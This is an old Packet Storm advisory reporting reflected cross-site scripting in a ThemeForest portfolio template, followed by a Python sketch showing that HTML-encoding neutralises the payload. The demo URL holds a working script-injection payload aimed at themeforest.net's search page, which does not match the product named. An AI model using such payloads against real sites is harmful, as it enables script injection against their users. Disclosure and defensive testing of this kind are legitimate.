packetstorm | L0rd CrusAd3r | PACKETSTORM:90529
Jun 09, 2010 - 12:00 a.m.

Dynamic Portfolio Template Cross Site Scripting

packetstormsecurity.com
`  
  
Author: L0rd CrusAd3r aka VSN [[email protected]]  
Exploit Title: Dynamic Portfolio Template XSS Vulnerability  
Version: 1.0  
Platform: Linux, Windows  
Price: 12$  
Vendor url: http://themeforest.net  
Published: 2010-06-09  
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue™®, S1ayer and to all ICW  
members  
#############################################################################################################################################################################  
  
  
  
Description:  
  
Dynamic Portfolio is designed to be used as a design or photography portfolio  
website.  
It is easy to install and update: all you have to do is copy the files  
to your server and add some of your portfolio examples, and you will be up and  
running in no time.  
  
Features:  
  
Valid XHTML, tableless Design  
jQuery Support:  
Vertical smooth scrolling website  
Featured portfolio item  
Portfolio item slider  
Customized browser scrollbar with CSS  
jQuery Elegant preview with lightbox  
Working jQuery/PHP contact form  
All source PSD files included  
Documentation File  
###############################################################################################################################################################################  
  
Vulnerability:  
  
*XSS Vulnerability found  
  
DEMO URL :  
http://themeforest.net/searches?term=%27%22--%3E%3Cscript%3Ealert%280x000872%29%3C%2Fscript%3E&type=%2722  
  
  
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  
# 0day no more #  
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  
  
  
################################################################################################################################################################################  
--   
With R3gards,  
L0rd CrusAd3r  
  
  
  
`
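
As an added example (not part of the original advisory or the vendor's code), the Python sketch below decodes the `term` parameter from the demo URL and shows that HTML-encoding it on output keeps the `<script>` tag out of the markup in each context the `'"-->` prefix is built to close. The page fragments in `CONTEXTS` are hypothetical; the advisory does not show the markup that reflects the value.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Demo URL exactly as published in the advisory above.
DEMO_URL = ("http://themeforest.net/searches?term=%27%22--%3E%3Cscript%3E"
            "alert%280x000872%29%3C%2Fscript%3E&type=%2722")

# Hypothetical result-page fragments (assumed, not taken from the product):
# the prefix '"--> closes a single-quoted attribute, a double-quoted
# attribute and an HTML comment, so all three are covered, plus element text.
CONTEXTS = {
    "double-quoted attribute": '<input name="term" value="{}">',
    "single-quoted attribute": "<input name='term' value='{}'>",
    "html comment": "<!-- last search: {} -->",
    "element body": "<h1>Results for {}</h1>",
}


def search_term(url):
    """Return the percent-decoded `term` query parameter of the URL."""
    return parse_qs(urlsplit(url).query)["term"][0]


def encode_term(term):
    """HTML-encode &, <, >, and both quote characters before output."""
    return html.escape(term, quote=True)


def script_survives(fragment):
    """True if a literal <script> tag reaches the rendered markup."""
    return "<script>" in fragment.lower()


def audit(url):
    """Map each context to (raw reflection unsafe?, encoded reflection unsafe?)."""
    term = search_term(url)
    return {
        name: (script_survives(template.format(term)),
               script_survives(template.format(encode_term(term))))
        for name, template in CONTEXTS.items()
    }


if __name__ == "__main__":
    print("decoded term:", search_term(DEMO_URL))
    for name, (raw, encoded) in audit(DEMO_URL).items():
        print(f"{name:24} raw={raw} encoded={encoded}")
```
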